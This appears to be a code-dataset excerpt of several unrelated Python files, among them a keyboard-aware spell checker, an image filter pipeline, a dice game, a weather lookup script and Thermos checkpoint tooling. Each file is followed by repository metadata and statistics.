plt.xlabel('Number of Games')
plt.ylabel('Percentage of Agent Wins or Draws')
plt.show()
| 34.436842 | 107 | 0.561058 | 795 | 6,543 | 4.474214 | 0.208805 | 0.031487 | 0.030363 | 0.031487 | 0.264268 | 0.187799 | 0.07928 | 0.07928 | 0.067473 | 0.058195 | 0 | 0.050988 | 0.334556 | 6,543 | 189 | 108 | 34.619048 | 0.765962 | 0.073667 | 0 | 0.2 | 0 | 0 | 0.028921 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.028571 | 0 | 0.157143 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec9af37320f3317b87c57c752336e62fe5c3973 | 3,402 | py | Python | util/visualize3d.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
] | 8 | 2020-10-08T13:32:33.000Z | 2021-12-08T10:59:03.000Z | util/visualize3d.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
] | null | null | null | util/visualize3d.py | jshuhnow/OddEyeCam | ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | [
"MIT"
] | 1 | 2021-04-15T23:50:13.000Z | 2021-04-15T23:50:13.000Z | import os
import sys
from core.math_tool.coordinate_system import CoordSys
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import cv2
def _update_element(obj,data,is_Point=False):
if is_Point:
obj.set_data(data[0], data[1])
obj.set_3d_properties(data[2], zdir="z")
else:
obj.set_data(data[:,0], data[:,1])
obj.set_3d_properties(data[:,2], zdir="z")
def _update(obj_list,data,length=100):
pos = data.center
x_axis = np.array([pos, pos + data.x_axis*length])
y_axis = np.array([pos, pos + data.y_axis*length])
z_axis = np.array([pos, pos + data.z_axis*length])
_update_element(obj_list[0],pos,is_Point=True)
_update_element(obj_list[1],x_axis)
_update_element(obj_list[2],y_axis)
_update_element(obj_list[3],z_axis)
def visualize_3d(ref_,pred_,truth=None,user_exit=False):
# Plot Configure
plt.ion()
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(111, projection='3d') # Axe3D object
ax.set_xlabel('$x$',); ax.set_ylabel('$y$'); ax.set_zlabel('$z$')
ax.view_init(elev=120, azim=60)
ax.dist = 10
r_start, r_end = -1,1
x_axis_, y_axis_, z_axis_ = np.array([[-400,0,0],[400,0,0]]), np.array([[0,-400,0],[0,400,0]]), np.array([[0,0,0],[0,0,800]])
# Reference Object
visRefPoints, = ax.plot(range(r_start,r_end),
range(r_start,r_end),
range(r_start,r_end),
alpha=1, linestyle="", marker=".", c='g')
visRefAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
visRefAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
visRefAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
# Phone Object
visPredPoints, = ax.plot(range(r_start,r_end),
range(r_start,r_end),
range(r_start,r_end),
alpha=0.6, linestyle="", marker=".", c='r')
visPredAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
visPredAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
visPredAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
visTruthPoints, = ax.plot(range(r_start,r_end),
range(r_start,r_end),
range(r_start,r_end),
alpha=0.6, linestyle="", marker=".", c='b')
visTruthAxisX, = ax.plot(x_axis_[:,0], x_axis_[:,1], x_axis_[:,2],alpha=0.6, c='r')
visTruthAxisY, = ax.plot(y_axis_[:,0], y_axis_[:,1], y_axis_[:,2],alpha=0.6, c='g')
visTruthAxisZ, = ax.plot(z_axis_[:,0], z_axis_[:,1], z_axis_[:,2],alpha=0.6, c='b')
# Visualization Object List
ref_vis = [visRefPoints, visRefAxisX, visRefAxisY, visRefAxisZ]
pred_vis = [visPredPoints, visPredAxisX, visPredAxisY, visPredAxisZ]
truth_vis = [visTruthPoints, visTruthAxisX, visTruthAxisY, visTruthAxisZ]
while True:
ref,pred = ref_[0],pred_[0]
if ref is None or pred is None:
continue
if user_exit:
exit()
# _update(ref_vis,ref,length=800)
_update(pred_vis,pred)
if not truth is None:
_update(truth_vis,truth)
fig.canvas.draw()
fig.canvas.flush_events() | 43.063291 | 129 | 0.592593 | 527 | 3,402 | 3.56167 | 0.225806 | 0.03463 | 0.041023 | 0.053277 | 0.386787 | 0.351625 | 0.318061 | 0.318061 | 0.318061 | 0.318061 | 0 | 0.044952 | 0.228395 | 3,402 | 79 | 130 | 43.063291 | 0.670095 | 0.033804 | 0 | 0.089552 | 0 | 0 | 0.008534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0 | 0.104478 | 0 | 0.149254 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ecb338cf3968f1e2415034f8610eb76602e4a7a | 7,134 | py | Python | spell/keyboardspell.py | leolca/spellcheck | 1edf7a598052822d0f95885288a3cf7f6d706c84 | [
"MIT"
] | null | null | null | spell/keyboardspell.py | leolca/spellcheck | 1edf7a598052822d0f95885288a3cf7f6d706c84 | [
"MIT"
] | null | null | null | spell/keyboardspell.py | leolca/spellcheck | 1edf7a598052822d0f95885288a3cf7f6d706c84 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .utils import exists, nlargest, removeMultiple
from .spell import Spell
class KeyboardSpell(Spell):
def __init__(self, spelldic=None, corpusfile=None, suffixfile=None, language=None, encoding=None, keyboardlayoutfile=None, weightObjFun=None):
# call the parent constructor
Spell.__init__(self, spelldic, corpusfile, suffixfile, language, encoding)
#super(self.__class__, self).__init__(spelldic)
# or Spell.__init__(self, dicFile)
self.load_keyboard_layout(keyboardlayoutfile)
self.set_weightObjFun(weightObjFun)
#if weightObjFun is None:
# self.weightObjFun = (0.5, 0.5)
#else:
# self.set_weightObjFun(weightObjFun)
#if sum(weightObjFun) != 1:
# raise TypeError("Weights do not sum 1.")
#self.weightObjFun = weightObjFun
@classmethod
def from_file(cls, spelldic=None, corpusfile=None, suffixfile=None, language=None, encoding=None, keyboardlayoutfile=None, weightObjFun=None):
return cls(spelldic, corpusfile, suffixfile, language, encoding, keyboardlayoutfile, weightObjFun)
#mySpell = super().from_file(filename)
#mySpell.load_keyboard_layout(keyboardlayoutfile)
#mySpell.set_weightObjFun(weightObjFun)
#return mySpell
# @classmethod
# def from_dictionary(cls, spelldic, keyboardlayoutfile=None, weightObjFun=None):
# mySpell = super().from_dictionary(spelldic)
# mySpell.load_keyboard_layout(keyboardlayoutfile)
# mySpell.set_weightObjFun(weightObjFun)
# return mySpell
# @classmethod
# def from_text_corpus(cls, textfile=None, keyboardlayoutfile=None, weightObjFun=None):
# mySpell = super().from_text_corpus(textfile)
# mySpell.load_keyboard_layout(keyboardlayoutfile)
# mySpell.set_weightObjFun(weightObjFun)
# return mySpell
def set_weightObjFun(self, weight):
if weight is None:
self.weightObjFun = (0.5, 0.5)
else:
if sum(weight) != 1:
raise TypeError("Weights do not sum 1.")
self.weightObjFun = weight
def load_keyboard_layout(self, keyboardlayoutfile):
"""
Read keyboard layout from JSON file or text file (in this case, performs a literal evaluation of the python string).
Args:
keyboardlayoutfile: A keyboard layout file in JSON format or using python syntax.
"""
import json
if keyboardlayoutfile is not None:
if keyboardlayoutfile.endswith('.json'):
with open(keyboardlayoutfile, 'r') as f:
self.kblayout = json.load(f)
else:
import ast
with open(keyboardlayoutfile, 'r') as f:
self.kblayout = ast.literal_eval(f.read())
def getCharacterCoord(self, c):
"""
Finds a 2-tuple representing c's position on the given keyboard array.
If the character is not in the given array, throws a ValueError
"""
row = -1
column = -1
if self.kblayout is None:
raise Exception("Speller keyboard is empty!")
for kb in self.kblayout:
for r in kb:
if c in r:
row = kb.index(r)
column = r.index(c)
return (row, column)
raise ValueError(c + " not found in given keyboard layout")
def typoDistance(self, s, t, saturation=1000):
"""
Finds the typo Manhattan distance (an integer) between two characters, based
on the keyboard layout. The distance might be a saturated value.
"""
# add one if one is lowercase and other is not (shift diff)
addShiftDiff = int( s.islower() != t.islower() )
sc = self.getCharacterCoord(s.lower())
tc = self.getCharacterCoord(t.lower())
return min( sum( [abs(x-y) for x,y in zip(sc,tc)] ) + addShiftDiff, saturation)
def keyboard_damerau_levenshtein_distance(self, s1, s2, saturation=4):
"""
Computes the Damerau-Levenshtein distance between two strings considering different typo distances according to their keyboard distance.
The substitution cost is given by the keyboard distance between the two typos involved.
The insertion and deletion cost is the minimum distance between the inserted/deleted typo and the previous and next typo.
"""
d = {}
lenstr1 = len(s1)
lenstr2 = len(s2)
for i in range(-1,lenstr1+1):
d[(i,-1)] = i+1
for j in range(-1,lenstr2+1):
d[(-1,j)] = j+1
for i in range(lenstr1):
for j in range(lenstr2):
if s1[i] == s2[j]:
cost = 0
else:
cost = self.typoDistance(s1[i], s2[j], saturation=saturation)
delcost = min( self.typoDistance(s1[i], s1[i-1], saturation=saturation) if i > 0 and i < lenstr1 else 10,
self.typoDistance(s1[i], s1[i+1], saturation=saturation) if i > -1 and i < lenstr1-1 else 10
)
inscost = min( self.typoDistance(s2[j], s2[j-1], saturation=saturation) if j > 0 and j < lenstr2 else 10,
self.typoDistance(s2[j], s2[j+1], saturation=saturation) if j > -1 and j < lenstr2-1 else 10
)
#print 'delcost=' + str(delcost) + ', inscost=' + str(inscost) + ', cost=' + str(cost)
d[(i,j)] = min(
d[(i-1,j)] + delcost, # deletion
d[(i,j-1)] + inscost, # insertion
d[(i-1,j-1)] + cost, # substitution
)
if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:
d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition
return d[lenstr1-1,lenstr2-1]
def ObjectiveFunction(self, candidate, word, saturation=4):
"""
Provides the objective function to the optimization process.
It balances the probability of a candidate and its typing keyboard distance from the misspelled word.
f
log ---
m log d
w0 --------- - w1 ---------
M log d
log --- max
m
w_1 \frac{\log (f/m)}{\log (M/m)} - w_2 \frac{ \log d}{\log d_{max}}
"""
if self.weightObjFun[1] > 0:
d = self.keyboard_damerau_levenshtein_distance(candidate, word, saturation)
maxdist = saturation*max(len(candidate),len(word))
if candidate in self.WORDS:
return self.weightObjFun[0]*(log10(float(self.WORDS[candidate])/self.m) / log10(float(self.M)/self.m)) - self.weightObjFun[1]*(log10(float(d)) / log10(maxdist))
else:
return -d
return Spell.ObjectiveFunction(self, candidate, word)
else:
return super(KeyboardSpell,self).ObjectiveFunction(candidate, word)
return self.P(candidate)
| 45.43949 | 174 | 0.585506 | 844 | 7,134 | 4.885071 | 0.241706 | 0.03056 | 0.021829 | 0.036866 | 0.294446 | 0.256124 | 0.252244 | 0.226049 | 0.205675 | 0.191123 | 0 | 0.021691 | 0.308523 | 7,134 | 156 | 175 | 45.730769 | 0.814109 | 0.340342 | 0 | 0.083333 | 0 | 0 | 0.019822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0.011905 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ecc375f9b2ef579824f623a0c86a56a39d05d4d | 2,262 | py | Python | src/helpTool/imFilterPipeline.py | uguisu/DraftTensorflow_chinese_hand_writing | 13f4097dff53ff32d10d51789975700e18052500 | [
"Apache-2.0"
] | null | null | null | src/helpTool/imFilterPipeline.py | uguisu/DraftTensorflow_chinese_hand_writing | 13f4097dff53ff32d10d51789975700e18052500 | [
"Apache-2.0"
] | 1 | 2018-01-25T06:39:52.000Z | 2018-01-25T13:37:44.000Z | src/helpTool/imFilterPipeline.py | uguisu/DraftTensorflow_chinese_hand_writing | 13f4097dff53ff32d10d51789975700e18052500 | [
"Apache-2.0"
] | 1 | 2018-04-22T13:55:18.000Z | 2018-04-22T13:55:18.000Z | # encoding: UTF-8
import cv2
import numpy as np
class ImFilterPipeline:
def __init__(self):
# init pipeline
self._pipeline = {
"rotated": 0,
"blur": 0,
"gaussianBlur": 0,
"resize": 0
}
@property
def pipeline(self):
return self._pipeline
def _rotate_bound_with_white_background(self, image, angle):
"""
Copy from imutils.rotate_bound. Change background color from (0,0,0) to (255,255,255)
:param image: image
:param angle: angle from 0 ~ 360
:return: processed image
"""
# grab the dimensions of the image and then determine the
# center
(h, w) = image.shape[:2]
(cX, cY) = (w / 2, h / 2)
# grab the rotation matrix (applying the negative of the
# angle to rotate clockwise), then grab the sine and cosine
# (i.e., the rotation components of the matrix)
M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
cos = np.abs(M[0, 0])
sin = np.abs(M[0, 1])
# compute the new bounding dimensions of the image
nW = int((h * sin) + (w * cos))
nH = int((h * cos) + (w * sin))
# adjust the rotation matrix to take into account translation
M[0, 2] += (nW / 2) - cX
M[1, 2] += (nH / 2) - cY
# perform the actual rotation and return the image
return cv2.warpAffine(image, M, (nW, nH), borderValue=(255, 255, 255))
def _blur(self, image, ksize=(5, 5)):
return cv2.blur(image, ksize)
def _gaussianBlur(self, image, ksize=(5, 5), sigmaX=0):
return cv2.GaussianBlur(image, ksize, sigmaX)
def _resize(self, image, target_size=64):
return cv2.resize(image, (target_size, target_size))
def filter(self, image):
rtn = image
if self._pipeline["rotated"] == 1:
rtn = self._rotate_bound_with_white_background(rtn, np.random.choice(np.arange(0, 360), 1))
if self._pipeline["blur"] == 1:
rtn = self._blur(rtn)
if self._pipeline["gaussianBlur"] == 1:
rtn = self._gaussianBlur(rtn)
if self._pipeline["resize"] == 1:
rtn = self._resize(rtn)
return rtn
| 29.763158 | 103 | 0.564987 | 297 | 2,262 | 4.20202 | 0.319865 | 0.057692 | 0.044872 | 0.032051 | 0.073718 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043786 | 0.313439 | 2,262 | 75 | 104 | 30.16 | 0.75982 | 0.2542 | 0 | 0 | 0 | 0 | 0.035605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0 | 0.04878 | 0.097561 | 0.390244 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ecef356f844a42e3d374691a1124f1ea40fd4a1 | 1,225 | py | Python | etc/metadataParsers/includes/nameparser-0.2.3/setup.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | etc/metadataParsers/includes/nameparser-0.2.3/setup.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | etc/metadataParsers/includes/nameparser-0.2.3/setup.py | organisciak/HTRC-BookwormDB | bc24080d6443f8da38255e19149431c9e5b182ab | [
"MIT"
] | null | null | null | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import nameparser
import os
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
README = read('README.rst')
setup(name='nameparser',
packages = ['nameparser'],
description = 'A simple Python module for parsing human names into their individual components.',
long_description = README,
version = nameparser.__version__,
url = nameparser.__url__,
author = nameparser.__author__,
author_email = nameparser.__author_email__,
license = nameparser.__license__,
keywords = ['names','parser'],
classifiers = [
'Intended Audience :: Developers',
'Operating System :: OS Independent',
"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
'Programming Language :: Python',
'Development Status :: 5 - Production/Stable',
'Natural Language :: English',
"Topic :: Software Development :: Libraries :: Python Modules",
'Topic :: Text Processing :: Linguistic',
]
)
| 35 | 105 | 0.629388 | 119 | 1,225 | 6.252101 | 0.672269 | 0.02957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001111 | 0.265306 | 1,225 | 34 | 106 | 36.029412 | 0.825556 | 0.016327 | 0 | 0 | 0 | 0 | 0.383721 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.166667 | 0.033333 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed11d23c76018ac70846f21efa7b622a426700a | 973 | py | Python | DiceRoll.py | SwethaGudla/Dice_POC | 818b343773027791508b59badf7159b1fee5f2f8 | [
"BSD-3-Clause"
] | null | null | null | DiceRoll.py | SwethaGudla/Dice_POC | 818b343773027791508b59badf7159b1fee5f2f8 | [
"BSD-3-Clause"
] | null | null | null | DiceRoll.py | SwethaGudla/Dice_POC | 818b343773027791508b59badf7159b1fee5f2f8 | [
"BSD-3-Clause"
] | null | null | null | import roll_dice as r #importing RollDice module
COUNT = 0 #initializing count
while True:
roll = input("Enter your choice(d/u/l/r): ").lower() #Pick your choice
if roll == 'down' or roll == 'd':
r.dice_down(r.res)
COUNT+=1
elif roll == 'up'or roll =='u':
r.dice_up(r.res)
COUNT+=1
elif roll == 'left'or roll =='l':
r.dice_left(r.res)
COUNT+=1
elif roll == 'right'or roll =='r':
r.dice_right(r.res)
COUNT+=1
elif roll == 'quit'or roll =='q': #To quit
print('\n')
print("number of times dices roll: ",COUNT)
for i in r.list_all:
r.dice(i)#To return all position of a dice
print("latest position of dice")
r.dice(r.res)
print('Thanks for Participation, Visit Again!!!')
break
else:
print('Invalid move\nPlease Make Correct Choice!!! ')
| 27.027778 | 75 | 0.51593 | 136 | 973 | 3.647059 | 0.441176 | 0.060484 | 0.072581 | 0.080645 | 0.145161 | 0.145161 | 0 | 0 | 0 | 0 | 0 | 0.007899 | 0.349435 | 973 | 35 | 76 | 27.8 | 0.775671 | 0.103803 | 0 | 0.148148 | 0 | 0 | 0.229369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.037037 | 0.185185 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed3c961a32f648b6ecbf986b24a8369b72e355c | 457 | py | Python | 05_data_science/matplotlib/bar_chart.py | bluehenry/python.best.practices | 99fde3557b0c423d3050e988e82a641ccd75b644 | [
"MIT"
] | null | null | null | 05_data_science/matplotlib/bar_chart.py | bluehenry/python.best.practices | 99fde3557b0c423d3050e988e82a641ccd75b644 | [
"MIT"
] | null | null | null | 05_data_science/matplotlib/bar_chart.py | bluehenry/python.best.practices | 99fde3557b0c423d3050e988e82a641ccd75b644 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
divisions = ['Admin', 'Development', 'Lead', 'HR']
salary = [10, 14,20, 12]
age = [28, 30, 45, 32]
index = np.arange(4)
width = 0.3
plt.bar(index, salary, width, color='green', label='Salary')
plt.bar(index+width, age, width, color='blue', label='Age')
plt.title('Divisions Bar Chart')
plt.xlabel('Divisions')
plt.ylabel('NUmber')
plt.xticks(index+width/2, divisions)
plt.legend(loc='best')
plt.show()
| 22.85 | 60 | 0.684902 | 73 | 457 | 4.287671 | 0.60274 | 0.038339 | 0.070288 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049628 | 0.118162 | 457 | 19 | 61 | 24.052632 | 0.727047 | 0 | 0 | 0 | 0 | 0 | 0.171053 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed58557b8e3435731641f5c05374ed0db710745 | 1,951 | py | Python | python/clima.py | crato-thaissa/crato-thaissa.github.Io | 91d18e38461bdd202f0262abace65595fa1efa96 | [
"MIT"
] | null | null | null | python/clima.py | crato-thaissa/crato-thaissa.github.Io | 91d18e38461bdd202f0262abace65595fa1efa96 | [
"MIT"
] | null | null | null | python/clima.py | crato-thaissa/crato-thaissa.github.Io | 91d18e38461bdd202f0262abace65595fa1efa96 | [
"MIT"
] | null | null | null |
from string import *
import json, sys
from urllib.request import urlopen
#parameters
params1 = "<||^{tss+^=r]^/\A/+|</`[+^r]`;s.+|+s#r&sA/+|</`y_w"
params2 = ':#%:%!,"'
params3 = "-#%&!&')&:-/$,)+-.!:-::-"
params4 = params2 + params3
params_id = "j+^^=.w"
unit = [ "k", "atm"]
data1 = printable
data2 = punctuation+ascii_uppercase+ascii_lowercase+digits
encrypt = str.maketrans(dict(zip(data1, data2)))
decrypt = str.maketrans(dict(zip(data2, data1)))
#obter função clima
def getWeather(weather):
lin = params1.translate(decrypt)
kim = params4.translate(decrypt)
idm = params_id.translate(decrypt)
link = urlopen(lin + weather + idm + kim).read()
getjson = json.loads(link)
#result = getjson.gets()
print("A previsao do tempo em {}".format(weather),'\n')
main = getjson.get("main", {"temp"})
main2 = getjson.get("main", {"pressure"})
main3 = getjson.get("main", {"humidity"})
main4 = getjson.get("main", {"temp_min"})
main5 = getjson.get("main", {"temp_max"})
main6 = getjson.get("main", {"tomorrow"})
wind = getjson.get("wind", {"speed"})
sys = getjson.get("sys", {"country"})
coord = getjson.get("coord", {"lon"})
coord1 = getjson.get("coord", {"lat"})
weth = getjson.get("weather", {"description"})
# output objects
#print("Description :",weth['description'])
print("Temperatura :",round(main['temp']-273), "deg")
print("Pressao :",main2["pressure"],"atm")
print("Umidade :",main3["humidity"])
print("Velocidade-vento :",wind['speed'],"mph")
print("Max-temp: {}c , Min-temp: {}c".format(round(main5['temp_max']-273),round(main4['temp_min']-273)))
print("Latitude :",coord['lat'])
print("Longitude :",coord['lon'])
print("Pais :",sys['country'])
ent = input() or "cacule"
try:
getWeather(ent)
except:
print("Coloque outra cidade")
finally:
print("\n")
print("Tschüss / Goodbye / Adeus") | 29.119403 | 108 | 0.603793 | 234 | 1,951 | 4.995727 | 0.482906 | 0.094098 | 0.071856 | 0.046193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020383 | 0.170169 | 1,951 | 67 | 109 | 29.119403 | 0.701668 | 0.055356 | 0 | 0 | 0 | 0 | 0.25136 | 0.040261 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021277 | false | 0 | 0.06383 | 0 | 0.085106 | 0.276596 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed69e0440b6aec85c5fa9e138215b592e9adcb1 | 2,309 | py | Python | src/main/python/apache/thermos/bin/thermos_ckpt.py | zmanji/incubator-aurora | 9f594f1de6bbf46c74863dd3fc4d2708b7a974f2 | [
"Apache-2.0"
] | null | null | null | src/main/python/apache/thermos/bin/thermos_ckpt.py | zmanji/incubator-aurora | 9f594f1de6bbf46c74863dd3fc4d2708b7a974f2 | [
"Apache-2.0"
] | null | null | null | src/main/python/apache/thermos/bin/thermos_ckpt.py | zmanji/incubator-aurora | 9f594f1de6bbf46c74863dd3fc4d2708b7a974f2 | [
"Apache-2.0"
] | null | null | null | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import pprint
import sys
import time
from twitter.common import app
from twitter.common.recordio import RecordIO, ThriftRecordReader
from apache.thermos.common.ckpt import CheckpointDispatcher
from gen.apache.thermos.ttypes import RunnerCkpt, RunnerState, TaskState
app.add_option(
"--checkpoint",
dest="ckpt",
metavar="CKPT",
help="read checkpoint from CKPT")
app.add_option(
"--assemble",
dest="assemble",
metavar="CKPT",
default=True,
help="whether or not to replay the checkpoint records.")
def main(args):
values = app.get_options()
if len(args) > 0:
print("ERROR: unrecognized arguments: %s\n" % (" ".join(args)), file=sys.stderr)
app.help()
sys.exit(1)
if not values.ckpt:
print("ERROR: must supply --checkpoint", file=sys.stderr)
app.help()
sys.exit(1)
fp = file(values.ckpt, "r")
rr = ThriftRecordReader(fp, RunnerCkpt)
wrs = RunnerState(processes={})
dispatcher = CheckpointDispatcher()
try:
for wts in rr:
print('Recovering: %s' % wts)
if values.assemble is True:
dispatcher.dispatch(wrs, wts)
except RecordIO.Error as err:
print('Error recovering checkpoint stream: %s' % err, file=sys.stderr)
return
print('\n\n\n')
if values.assemble:
print('Recovered Task Header')
pprint.pprint(wrs.header, indent=4)
print('\nRecovered Task States')
for task_status in wrs.statuses:
print(' %s [pid: %d] => %s' % (
time.asctime(time.localtime(task_status.timestamp_ms / 1000.0)),
task_status.runner_pid,
TaskState._VALUES_TO_NAMES[task_status.state]))
print('\nRecovered Processes')
pprint.pprint(wrs.processes, indent=4)
app.main()
| 27.488095 | 84 | 0.695972 | 313 | 2,309 | 5.079872 | 0.460064 | 0.037736 | 0.024528 | 0.020126 | 0.03522 | 0.03522 | 0.03522 | 0.03522 | 0 | 0 | 0 | 0.007491 | 0.190559 | 2,309 | 83 | 85 | 27.819277 | 0.843232 | 0.225639 | 0 | 0.148148 | 0 | 0 | 0.183766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018519 | false | 0 | 0.148148 | 0 | 0.185185 | 0.240741 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed6cda7ad637a16bcaea267f7b03c869ea08e8b | 1,913 | py | Python | test/lib/testFixed.py | animator/titus2 | 1d35fab2950bd9f0438b931a02996475271a695e | [
"Apache-2.0"
] | 18 | 2019-11-29T08:53:58.000Z | 2021-11-19T05:33:33.000Z | test/lib/testFixed.py | animator/titus2 | 1d35fab2950bd9f0438b931a02996475271a695e | [
"Apache-2.0"
] | 2 | 2020-04-29T12:58:32.000Z | 2021-03-23T05:55:43.000Z | test/lib/testFixed.py | animator/titus2 | 1d35fab2950bd9f0438b931a02996475271a695e | [
"Apache-2.0"
] | 1 | 2020-05-05T15:10:27.000Z | 2020-05-05T15:10:27.000Z | #!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import unittest
from titus.genpy import PFAEngine
from titus.errors import *
class TestLib1Fixed(unittest.TestCase):
def testToBytes(self):
engine, = PFAEngine.fromYaml('''
input: {type: fixed, name: Test, size: 10}
output: bytes
action:
fixed.toBytes: input
''')
self.assertEqual(engine.action("0123456789"), "0123456789")
def testFromBytes(self):
engine, = PFAEngine.fromYaml('''
input: bytes
output: {type: fixed, name: Test, size: 10}
action:
- let:
original:
type: Test
value: "0123456789"
- fixed.fromBytes: [original, input]
''')
self.assertEqual(list(map(ord, engine.action(""))), [48, 49, 50, 51, 52, 53, 54, 55, 56, 57])
self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 57])
